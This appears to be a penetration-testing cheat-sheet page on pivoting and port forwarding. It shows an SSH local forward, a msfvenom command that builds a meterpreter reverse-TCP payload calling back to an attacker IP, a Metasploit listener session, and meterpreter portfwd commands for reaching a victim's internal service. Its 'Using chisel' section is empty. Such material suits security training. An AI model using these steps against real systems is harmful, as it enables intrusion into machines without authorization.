Skip to content

Pivot & Port forwarding

Port forwarding

The example.com machine has a web server running on port 8000 internally (not exposed to the internet). With the following command you can now access the web server from http://localhost:4444.

Using SSH

ssh -L 4444:127.0.0.1:8000 user@example.com

Using metasploit (meterpreter)

  • Generate the exploit with msfvenom.
$ msfvenom -p 'linux/x64/meterpreter_reverse_tcp' LHOST=10.132.0.2 LPORT=9001 -f elf > exploit.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1037272 bytes
Final size of elf file: 1037272 bytes

$ file exploit.bin
exploit.bin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
  • Setup listener
$ msfconsole
...
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST ens4
LHOST => 10.132.0.2
msf6 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.132.0.2:9001
[*] Meterpreter session 1 opened (10.132.0.2:9001 -> 10.154.0.2:45462 ) at 2021-10-19 19:27:31 +0000

meterpreter >
  • Do port forwarding
meterpreter > portfwd add -l 4444 -p 8000 -r 127.0.0.1
[*] Local TCP relay created: :4444 <-> 127.0.0.1:8000
meterpreter > portfwd list

Active Port Forwards
====================

   Index  Local           Remote        Direction
   -----  -----           ------        ---------
   1      127.0.0.1:8000  0.0.0.0:4444  Forward

1 total active port forwards.

meterpreter > portfwd delete -l 4444 -p 8000 -r 127.0.0.1
[*] Successfully stopped TCP relay on 0.0.0.0:4444

-l : Port on your local machine (attacker machine). -p : Port on the remote machine (victim machine). -r : Target host.

Using chisel

Back to top